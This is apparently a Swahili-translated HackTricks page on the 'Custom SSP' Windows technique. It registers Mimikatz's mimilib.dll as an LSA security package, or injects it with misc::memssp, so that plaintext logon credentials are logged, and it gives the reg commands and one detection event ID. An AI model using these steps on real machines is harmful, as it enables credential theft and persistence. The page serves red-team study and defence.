Custom SSP

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA USAJILI!
Pata swag rasmi ya PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

SSP ya Kibinafsi

Jifunze ni nini SSP (Mtoa Msaada wa Usalama) hapa. Unaweza kuunda SSP yako mwenyewe ili kupata kwa maandishi wazi vyeti vinavyotumiwa kupata mashine.

Mimilib

Unaweza kutumia mimilib.dll binary iliyotolewa na Mimikatz. Hii itaandika kwenye faili vyeti vyote kwa maandishi wazi. Weka dll kwenye C:\Windows\System32\ Pata orodha ya Pakiti za Usalama za LSA zilizopo:

mshambuliaji@lengo

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

Ongeza mimilib.dll kwenye orodha ya Mtoaji wa Usaidizi wa Usalama (Security Packages):

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

Na baada ya kuanza upya, vyeti vyote vinaweza kupatikana kwa maandishi wazi kwenye C:\Windows\System32\kiwissp.log

Kumbukumbu

Unaweza pia kuiingiza hii kumbukumbu moja kwa moja kwa kutumia Mimikatz (tambua kwamba inaweza kuwa kidogo isiyo imara/isiyofanya kazi):

privilege::debug
misc::memssp

Hii haitaishi baada ya kuzimwa upya.

Kupunguza Hatari

Tukio la Kitambulisho 4657 - Ukaguzi wa uundaji/mabadiliko ya HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

PreviousConstrained Delegation NextDCShadow

Last updated 1 month ago